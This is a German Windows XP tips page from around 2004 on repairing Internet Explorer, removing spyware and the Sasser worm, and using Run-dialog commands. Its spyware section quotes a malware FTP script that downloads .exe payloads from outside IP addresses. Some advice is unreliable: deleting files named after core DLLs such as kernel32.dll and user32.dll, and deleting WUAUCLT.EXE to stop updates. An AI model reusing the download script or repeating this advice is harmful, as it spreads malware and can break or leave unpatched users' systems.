|
InternetExplorer auf Werkseinstellung zurücksetzen
Wenn nach zB Dialer,- und Spyware - Attacken der IE spinnt....
...und Deine Startseite eigendlich "About:Blank" anzeigt, da aber eine Suchmaschine ist.
Das hat nichts mit Javascript oder ähnlichen Komponenten zu tun.
Hinter diesem Phänomen steckt lediglich, daß einige
wichtige Teile des IE's durch neue Drittanwenderdateien erstzt wurden.
Achtung:
Die neuen Komponenten sind immernoch auf der Festplatte, und muessen
lediglich wieder aktiviert werden.
Um nun zB besagtes Prob. zu beheben, gehe wie folgt vor:
Klicke dazu auf Start --->Ausführen und tippe in die
Befehlszeile das Wort -regsvr32 urlmon.dll klicke dann auf “Ok”
Außer für Benutzer von Windows XP sollte die Versionsnummer der oleaut32.dll
kleiner als 3.50.5014.0 sein. Je nach installierter Office-Version variert die
Versionsnummer der oleaut32.dll.
Falls du kein Windows XP benutzt und die Versionsnummer tiefer als 3.50.5014.0 ist,
führe folgende Schritte durch. Tippe unter Start - Ausführen folgendes ein:
- regsvr32 /i Urlmon.dll [Enter-Taste]
- regsvr32 /i actxprxy.dll
- regsvr32 /i Shdocvw.dll
- regsvr32 /i Mshtml.dll
- regsvr32 /i Msjava.dll
- regsvr32 /i Shell32.dll
- regsvr32 /i Oleaut32.dll
- regsvr32 /i Browseui.dll
- regsvr32.exe /u regsrv32.dll (ab Sp2)
Diese Befehle setzen div. System-Dateien auf "Werkseinstellung" zurück.
|
|
SpyWare VX2 Entfernung
Zur SpyWare VX2 & Co Entfernung:
Generell hilft der Klick auf “ Start ” > “Ausführen” und die Eingabe in Befehlszeile von:
- regsvr32 /u VX2.DLL ----> [Enter-Taste]
Zum endgültigen aktivieren der Änderungen muss ein Neustart durchgeführt werden.
Was dieses " About:Blank " Page - Problem angeht, mit der Suchmaschine als Startseite,
die einfach nicht weg will..., folgendes: Sucht Euer System mal nach folgenen .dll's ab. -
- ADVAPI32.dll (Vorsicht, ist auch als Systemdatei vorhanden)
- RPCRT4.dll
- SHLWAPI.dll
- m.dll
- kch.dll
- fehdj.dll - vom 29.04.2004
- pepmec.dl - (Ja, hier nur .dl)
- midp.dll - vom 02.05.2004
- cmlalf.dll
- kernel32.dll - Ist keine Systemdatei !!!
- ws2_32.dll
- user32.dll
- gdi32.dll
- advcheck.dll
- pndh.dll - vom 03.05.2004
- bbhco.dll
- gdabl.dll
- dhhnba.dll - vom 06.05.2004
- enbbmla.dll - vom 13.05.2004
- appci.dll
- apeaeaa.dll - vom 16.05.2004
- omn.dll
- mcg.dll
- kigihgd.dll Neue .dll's vom 18.05.2004
- eejhhh.dll
- akdbib.dll
...und löscht diese. Das sind Trojaner (oder veränderte Systemdatein), in .dll-Form, die von http://searchx.cc/ sind, - gemein klein, und effektiv. (ca.36 KB gross)
Denke, man hat sich's mit Java eingefangen, habe aber auch gehört, das solche .dll über Tauschbörsen ins Haus kommen.
!!! Wichtig !!!
Schaut aber unbedingt vorher in die Dateieigenschaften, ob die Datei nicht doch von Microsoft ist, da div. Datein im Ordner "dllcache" existent sind !!!
Und seit 1.Mai 2004 ist wohl die .dll "out" , und scheinen es jetzt wieder über .exe zu versuchen. Der PC war genau 24 Std
ohne Aufsicht (wegen IE-Freigabe) am Netzwerk, und Tag's darauf fand ich dann diese Dateien:
- 1621_up.exe
- 2409_up.exe
- 3292_up.exe
- 3870_up.exe
- 4603_up.exe
- 5878_up.exe
- 8302_up.exe
- 9039_up.exe
- 9960_up.exe
- 10064_up.exe
- 13785_up.exe
- 19939_up.exe
- 20389_up.exe
- 31880_up.exe
Die Zahlenfolge kann vareieren, was aber immer gleich bleibt, ist die Dateigröße, mit 15,5KB.
Was es auch ist; Löscht solche fragwürdigen Dateien lieber.... Dazu fand ich noch eine
Datei mit dem Namen "cmd.ftp"...mit dem Inhalt (Öffnen, mit Editor):
open 217.232.159.43 5554
anonymous
bin
get 3870_up.exe
bye
open 217.107.77.106 5554
anonymous
bin
get 19939_up.exe
bye
open 217.232.250.103 5554
!! Diesen File ebenfalls LÖSCHEN !!
Aktuell:
Sucht Euer System auch gleich mal nach der Datei "avserve2.exe" ab.
Hierbei handelt es sich um den SasserB. - C. Wurm.-
der einen Pufferüberlauf, der die Remote-Ausführung von Code zulässt und einem Angreifer die Steuerung über das gesamte infizierte System ermöglicht.
Dein Rechner macht sich selbstständig und gibt Dir noch 45 Sec. bis zu Herunterfahren. Mit dem Befehl "shutdown -a" in "Start --> Auführen.."
stoppt Ihr diesen Countdown. Nun fix den Patch von Microsoft XP Deu nachgeladen....
Wenn, nach Fund, gelöscht wurde, solltet Ihr umgehend mit XP-Clean die Registry säubern, und das am besten im "Abgesicherten Modus".
|
|
“Ausführen” Prog.-Liste
Einige weitere Programme die noch über die Befehlszeile "Ausführen” aufgerufen werden können:
- msconfig...........................[Enter-Taste]
Dieses kleine Tool ist wohl bei Win2000 schlichtweg vergessen worden.
Download hier, und dann in den Ordner
"C:\WINNT" und die Hilfedatei in "C:\WINNT\HELP" ablegen.
- regedit
- ipconfig /p /all
- gpedit.msc
- devmgmt.msc
- diskmgmt.msc
- conf.exe...............(NetMeeting)
- certmgr.msc.........(Zertifikat - Manager)
- ciadv.msc.............(Indexdienst)
- compmgmt.msc....(Computerverwaltung)
- dfrg.msc...............(Defragmentierung)
- driverquery /p......(Lister aller aktiven Treiber)
- drwtsn32.exe.......(Dr. Watson)
*
- sfc /scannow (scant alle wichtigen Systemfiles auf's XP-Orginal und ersetzt falsche Versionen mit "korrekter Microsoft Vers.")
- sfc /scanonce (scant alle wichtigen Systemfiles auf's XP-Orginal)
- sfc /scanboot (scant nach jedem Start)
- sfc /Revert (scan zurücksetzen)
*
- sfc.exe /purgecache ..................................... }nacheinander
- sfc.exe /cachsize=100
*
System File Checker (sfc) Tool Syntax:
- sfc [/Scannow] [/Scanonce] [/Scanboot] [/Revert] [/Purgecache] [/Cachesize=x]
- dxdiag.exe............(Direct X - Diagnoseprogramm)
- eudcedit.exe.........(Editor für benutzerdef. Zeichen)
- eventvwr.msc........(Ereignisanzeige)
- fsmgmt.msc..........(Freigegebene Ordner)
- label......................(Laufwerk umbenennen)
- lusrmgr.msc..........(Benutzer und Gruppen)
- mem /p..................(Speicher Belegung)
- mstsc.exe.............(Remotedesktopverbindung)
- narrator.exe..........(XP-Sprachausgabe)
- ntbackup.exe.........(Sicherungs - Wiederherstellungs - Assistent)
- ntmsoprq.msc........(Übersicht über Wechselmedien)
- odbcad32.exe........(ODBC-Datenquellen-Administrator)
- osk.........................(Bildschirmtastatur)
- packager.exe.........(Objekt Manager)
- progman.exe..........(Programm Manager)
- rtcshare.exe...........(Gemeinsame Sitzungen)
*
- Rundll32 diskcopy.dll,DiskCopyRunDll....................(Diskette Kopieren)
- Rundll32 shell32.dll,ShellAboutA.............................(WindowsXP Info)
- Rundll32 shell32.dll,SHHelpShortcuts_RunDLL Connect.......(Netzlaufwerk verbinden)
*
- sigverif.exe.............(Dateisignaturverifizierung)
- shrpubw.exe...........(Freigabe erstellen)
- sysedit....................(Systemkonfiguration /System.ini/Win.ini/config.sys/autoexec.bat/ )
- taskmgr.exe............(Task - Manager) *
- telnet.exe................(Telenet)
Alte Verbindungsmethoden wie telnet, rlogin, ftp, rcp, rsh übertragen eingegebene Passworte unverschlüsselt über das Netz und
gelten daher als sehr unsicher. *
- tourstart.exe............(XP Tour)
- utilman.exe..............(Bildschirm Lupe + Tastatur)
- winchat.exe.............(Windows Chat)
- wmimgmt.msc.........(WMI-Steuerung)
*
- rundll32 Shell32,OpenAs_RunDLL......(Box "Öffnen mit" aufrufen)
________________Aber ACHTUNG:________________
!!!!____Bitte führt diese Befehle nicht einfach aus, wenn Ihr nicht wirklich wißt,______!!!!!!
!!!!____was diese bewirken. Da diese teilweise Veränderungen sofort ausführen,____!!!!!!
!!!!________die nicht ohne weiteres rückgängig gemacht werden können.___________!!!!!!
|
nach Oben
|
Microsft Auto-Update löschen
Microsft Auto-Update löschen
Auto-Update zuverlässig zu deaktivieren, muss man in folgenden Ordnern (soweit vorhanden)
die Datei WUAUCLT.EXE z.B. in WUAUCLT.EX umbenennen, oder gleich ganz löschen *lol*
|
|
Desktop-Icon zum Sperren des Systems
Erstellen eines Desktop-Icons zum Sperren des Systems
Wenn Ihr das System sperren wollt, benötigt das einigen Klickaufwand, doch es geht auch einfacher.
Lege eine neue Verknüpfung auf dem Desktop an:
Klick mit der rechten Maustaste in einen freien Bereich auf dem Desktop
Wähle aus dem Kontextmenü NEU --> VERKNÜPFUNG
Es erscheint ein Assistent zum Anlegen von Verknüpfungen, geb hier im Feld den Ort des Objekts mit folgenden Befehl ein:
- rundll32.exe user32.dll,LockWorkStation
Klick auf WEITER und geb einen Namen für die Verknüpfung ein, z.B. System sperren.
Klicke nun auf FERTIGSTELLEN
|
nach Oben
|
Internet Explorer 6 Neu-Installation
Dieses Problem habe ich auch schon einigemale gehabt.
Der Internet Explorer hat zwar dem Spaywareangriff standgehalten, aber nun ist irgendwas faul....
Viele machen in diesem Moment den Fehler, den IE neu über den Defekten zu installieren.
Das kann zwar mal funzten, muss aber nicht.
Versuch es mal so..:
Lege Deine XP-Install CD ein.
Dann über Start / Ausführen in das Eingabefeld:
- rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%\inf\ie.inf
Bestätige das Ganze mit "OK".
Fertig, nun wird nicht nur der IE neu installiert, sondern der alte IE zuerst deinstall.
|
nach Oben
|
ZIP-Funktion deaktivieren
Die Windows XP-Interne ZIP-Funktion deaktivieren..., Start / Ausführen in das Eingabefeld:
- regsvr32 /u zipfldr.dll
Bestätige das Ganze mit "OK".
Wieder aktivieren:
- regsvr32 zipfldr.dll
...mit "OK".
|
nach Oben
|
Netzwerk & DFÜ - Verbindungsansich aktualisieren
Netzwerk-/DFÜ-Verbindungen werden nicht angezeigt, obwohl sie Aktiv sind..., Start / Ausführen in das Eingabefeld:
cmd ...dann:
- regsvr32 netman.dll
- regsvr32 netcfgx.dll
- regsvr32 netshell.dll
Bestätige jeweils das Ganze mit "OK".
PC neu booten, und die Netzwerk - und DFÜ-Verbindungen sind wieder existent.
Netmeeting installieren:
- conf
"OK"
|
|
Windows-Installer (MSI) Neuinstallation
Das Abschalten des Windows Installer Dienstes durch Anwendungen oder eigene Eingriffe
kann die Installation von Programmen verhindern.
Schalten Sie Ihn folgendermaßen wieder ein:
Klicke auf Start / Ausführen und tippe
- msiexec /unregister ein.
Bestätige das Ganze mit "OK".
Wieder aktivieren:
- msiexec /regserver
Bestätige...mit "OK".
|
nach Oben
|
System Shutdown-Countdown
System nach Vorgabe automatisch herunterfahren:
Start ---> Ausführen
- shutdown
+ die "Ausführungs-Befehle" dann dahinter:
-r reboot
-s shutdown
-t Zeit in sec
-a unterbricht Shutdown-Vorgang
z.B.
shutdown -s -t 360
... der PC fährt in 360 sec runter.
Bestätige...mit "OK".
|
nach Oben